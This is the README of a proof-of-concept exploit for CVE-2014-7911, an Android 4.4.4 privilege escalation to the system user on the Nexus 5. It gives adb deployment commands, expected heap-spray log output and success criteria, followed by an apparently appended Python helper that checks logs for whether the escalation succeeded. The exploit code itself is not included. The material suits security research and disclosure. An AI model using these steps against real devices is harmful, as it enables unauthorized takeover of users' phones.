CVE-2014-7911

PoC for CVE-2014-7911 on the Nexus 5 running Android 4.4.4_r1, based on retme7's work but using a different ROP chain.

Info: http://ele7enxxh.com/CVE-2014-7911-Detailed-Analysis-Of-Android-Local-Privilege-Escalation-To-System-Vulnerability.html

Usage

Connect your phone via adb:

adb push jni/expolit /data/local/tmp
adb logcat | grep auo_

Launch this PoC and tap the "CVE-2014-7911" button; you should see:

D/auo_CVE20147911(24892): staticAddr = 0x43a1f000
D/auo_CVE20147911(24892): heap sparying... 0
D/auo_CVE20147911(24892): heap sparying... 100
D/auo_CVE20147911(24892): heap sparying... 200
D/auo_CVE20147911(24892): heap sparying... 300
D/auo_CVE20147911(24892): heap sparying... 400
D/auo_CVE20147911(24892): heap sparying... 500
D/auo_CVE20147911(24892): heap sparying... 600
D/auo_CVE20147911(24892): heap sparying... 700
D/auo_CVE20147911(24892): heap sparying... 800
D/auo_CVE20147911(24892): heap sparying... 900
D/auo_CVE20147911(24892): heap sparying... 1000
D/auo_CVE20147911(24892): heap sparying... 1100
D/auo_CVE20147911(24892): heap sparying... 1200
D/auo_CVE20147911(24892): heap sparying... 1300
D/auo_CVE20147911(24892): heap sparying... 1400
D/auo_CVE20147911(24892): heap sparying... 1500
D/auo_CVE20147911(24892): heap sparying... 1600
D/auo_CVE20147911(24892): heap sparying... 1700
D/auo_CVE20147911(24892): heap sparying... 1800
D/auo_CVE20147911(24892): heap sparying... 1900

Then minimize the activity several times until the system crashes. If you see:

D/auo_exploit(22665): uid=1000(system) gid=1000(system)

the exploit has succeeded. If your phone just crashes, your device is vulnerable but the exploit may have failed (a different ROP chain would be needed).
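Added here as an illustration, not part of the PoC: a small Python triage helper that reads lines in the brief logcat format shown above and reports the spray progress, the printed address, process deaths and whether the `uid=1000(system)` marker appeared under an `auo_` tag. The sample log is constructed; the `auo_*` lines follow the README's format, and the `ActivityManager` line is an assumption about what a crash looks like in logcat.

```python
import re
from typing import Dict, Optional

# Constructed sample logcat output (not captured from a device); the auo_* lines
# follow the format the README shows, the ActivityManager line is an assumption.
SAMPLE_LOGCAT = """\
D/auo_CVE20147911(24892): staticAddr = 0x43a1f000
D/auo_CVE20147911(24892): heap sparying... 0
D/auo_CVE20147911(24892): heap sparying... 100
D/auo_CVE20147911(24892): heap sparying... 1900
I/ActivityManager( 1234): Process com.example.poc (pid 24892) has died
D/auo_exploit(22665): uid=1000(system) gid=1000(system)
"""

# logcat "brief" format: <priority>/<tag>(<pid>): <message>
LINE_RE = re.compile(r"^([VDIWEF])/([^(]+?)\(\s*(\d+)\):\s?(.*)$")
STATIC_RE = re.compile(r"staticAddr\s*=\s*(0x[0-9a-fA-F]+)")
SPRAY_RE = re.compile(r"heap sparying\.\.\.\s*(\d+)")
UID_RE = re.compile(r"uid=(\d+)\(([^)]*)\)")


def triage_logcat(text: str) -> Dict[str, Optional[object]]:
    """Summarise what the PoC reported: spray progress, target address,
    process deaths, and whether any auo_ line claims uid 1000 (system)."""
    summary = {
        "static_addr": None,    # address the PoC printed, as an int
        "spray_max": None,      # highest spray counter seen
        "deaths": 0,            # ActivityManager 'has died' lines (crash indicator)
        "escalated": False,     # an auo_ line reported uid=1000(system)
        "escalated_pid": None,  # pid of the process that reported it
    }
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        tag, pid, msg = m.group(2), int(m.group(3)), m.group(4)
        if tag == "ActivityManager" and "has died" in msg:
            summary["deaths"] += 1
            continue
        if not tag.startswith("auo_"):
            continue
        if (s := STATIC_RE.search(msg)):
            summary["static_addr"] = int(s.group(1), 16)
        elif (s := SPRAY_RE.search(msg)):
            n = int(s.group(1))
            prev = summary["spray_max"]
            summary["spray_max"] = n if prev is None else max(prev, n)
        elif (s := UID_RE.search(msg)) and int(s.group(1)) == 1000 and s.group(2) == "system":
            summary["escalated"] = True
            summary["escalated_pid"] = pid
    return summary
```

Feed it the output of `adb logcat` (the whole stream, not only the `grep auo_` view) so the crash indicator is counted alongside the PoC's own lines.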